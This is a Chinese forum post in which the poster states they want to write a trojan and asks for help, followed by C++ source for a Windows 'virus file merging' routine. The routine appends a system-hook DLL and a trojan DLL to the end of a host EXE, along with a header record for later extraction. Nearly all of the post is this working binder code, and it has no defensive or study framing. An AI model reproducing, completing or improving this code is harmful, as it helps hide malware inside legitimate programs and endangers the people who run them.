小弟想做个木马程序,以下是部分代码,请GGJJ们指导指导,不胜感激!!
#include "stdafx.h"
#include <stdio.h>
#include <io.h>
#include "..\\Include\\DataStruct.h"
//定义:安装钩子函数的指针
typedef BOOL (* LPINSTALLHOOKEX)(LPCSTR lpcExeName);
//EXE文件名称
CHAR g_ExeName[51];
//钩子DLL文件名
CHAR g_HookName[51];
//木马DLL文件名
CHAR g_CockName[51];
//获取Exe文件名称*.exe
void GetModuleName(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strcpy(buf, &p[1]);
strcat(buf, "\0");
}
}
void GetModuleNameEx(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
LPTSTR p = strrchr(path, 92);
strncpy(buf, &p[1], strlen(p + 1));
strncat(buf, "\0", 1);
}
}
//病毒文件合并程序,调用成功返回1,否则返回0
BYTE UniteFile(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
FILE *fpProg = NULL, *fpHook = NULL, *fpCock = NULL;
FILEDIS FileDis;
LONG lProg = 0, lHook = 0, lCock = 0, number = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strcpy(FileDis.FileIdentifier, FILEIDENTIFIER);
strcpy(FileDis.ProgName, lpProgFile);
strcpy(FileDis.HookDLLName, lpHookFile);
strcpy(FileDis.CockDLLName, lpCockFile);
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
fpProg = fopen(lpProgFile, "ab");
if (fpProg == NULL)
{
return 0;
}
fpHook = fopen(lpHookFile, "rb");
if (fpHook == NULL)
{
return 0;
}
fpCock = fopen(lpCockFile, "rb");
if (fpCock == NULL)
{
return 0;
}
//文件指针定位到开始,计算文件大小用
if (fseek(fpProg, 0L, SEEK_SET) != 0)
{
return 0;
}
//EXE文件大小
lProg = filelength(fileno(fpProg));
//系统钩子DLL文件大小
lHook = filelength(fileno(fpHook));
//木马程序DLL文件大小
lCock = filelength(fileno(fpCock));
//保存到文件头记录中
FileDis.ProgSize = lProg;
FileDis.HookDLLSize = lHook;
FileDis.CockDLLSize = lCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[lHook + 1];
cBufCock = new CHAR[lCock + 1];
//文件指针移动到EXE文件末尾
if (fseek(fpProg, lProg, SEEK_SET) != 0)
{
return 0;
}
//读取HOOK DLL文件体数据到缓冲区
number = fread(cBufHook, sizeof(CHAR), lHook, fpHook);
if (number < lHook)
{
return 0;
}
//读取木马DLL文件体数据到缓冲区
number = fread(cBufCock, sizeof(CHAR), lCock, fpCock);
if (number < lCock)
{
return 0;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
number = fwrite(cBufHook, sizeof(CHAR), lHook, fpProg);
if (number < lHook)
{
return 0;
}
//写入木马程序DLL文件体
number = fwrite(cBufCock, sizeof(CHAR), lCock, fpProg);
if (number < lCock)
{
return 0;
}
//文件头数据写入合并文件的尾部
number = fwrite(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
return 0;
}
//关闭文件指针
fclose(fpProg);
fclose(fpHook);
fclose(fpCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return 1;
}
//病毒文件合并程序(API版)
BOOL UniteFileEx(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
HANDLE hProg = NULL, hHook = NULL, hCock = NULL;
FILEDIS FileDis;
DWORD dwProg = 0, dwHook = 0, dwCock = 0, dwNumber = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
//保存文件名
strncpy(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER));
strncpy(FileDis.ProgName, lpProgFile, strlen(lpProgFile));
strncpy(FileDis.HookDLLName, lpHookFile, strlen(lpHookFile));
strncpy(FileDis.CockDLLName, lpCockFile, strlen(lpCockFile));
//分解标识置0
FileDis.IsFileReduced = 0;
//打开文件,调用失败则返回
hProg = CreateFile(lpProgFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hHook = CreateFile(lpHookFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hCock = CreateFile(lpCockFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//EXE文件大小
dwProg = GetFileSize(hProg, NULL);
//系统钩子DLL文件大小
dwHook = GetFileSize(hHook, NULL);
//木马程序DLL文件大小
dwCock = GetFileSize(hCock, NULL);
//保存到文件头记录中
FileDis.ProgSize = dwProg;
FileDis.HookDLLSize = dwHook;
FileDis.CockDLLSize = dwCock;
//为两个DLL文件申请数据缓冲区,读取数据用
cBufHook = new CHAR[dwHook + 1];
cBufCock = new CHAR[dwCock + 1];
//文件指针移动到EXE文件末尾
if (SetFilePointer(hProg, 0, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
//读取HOOK DLL文件体数据到缓冲区
if (!ReadFile(hHook, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//读取木马DLL文件体数据到缓冲区
if (!ReadFile(hCock, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//从EXE文件尾部开始写入钩子DLL文件体数据
if (!WriteFile(hProg, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
//写入木马程序DLL文件体
if (!WriteFile(hProg, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
//文件头数据写入合并文件的尾部
if (!WriteFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//关闭文件指针
CloseHandle(hProg);
CloseHandle(hHook);
CloseHandle(hCock);
//释放内存
delete[] cBufHook;
delete[] cBufCock;
return TRUE;
}